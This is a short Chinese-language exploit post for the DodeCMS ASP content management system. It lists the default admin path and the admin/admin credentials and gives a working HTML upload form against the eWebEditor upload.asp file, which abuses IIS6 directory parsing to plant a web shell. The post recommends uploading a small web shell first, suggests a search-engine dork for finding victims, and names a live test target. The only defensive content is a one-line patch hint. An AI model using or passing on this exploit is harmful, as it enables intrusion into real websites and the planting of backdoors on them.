DodeCMS成创网站内容管理系统由辽宁成创网络科技有限公司基于微软ASP、通用ACCESS数据库开发完成；
访问模式采用动态模式，基本上实现了系统的自定义功能，代码简洁高效，易于修改维护，可扩展性强。

默认后台路径：admin/
默认后台用户名密码 admin
官方网站：http://www.dodecms.com/

前提: IIS6.0+asp环境

漏洞文件：admin/eWebEditor/asp/upload.asp 代码略，成因略。（想知道自己百度）

利用代码：

<form action="http://www.hackqing.com/admin/eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp" method=post name=myform enctype="multipart/form-data">
<input type=file name=uploadfile size=100><br><br>
<input type=submit value=upload>
</form>

有图有真像(建议先传小马)：


测试：
Powered by DodeCMS

多的自己找关键词。天朝法令不允许。自己悠着点。

修补：
增加验证\更改路径\或直接删除。

By:Mr.DzY,由情整理编辑

测试报告：Powered by DodeCMSV1.1 测试目标http://www.6hl.net/bug.txt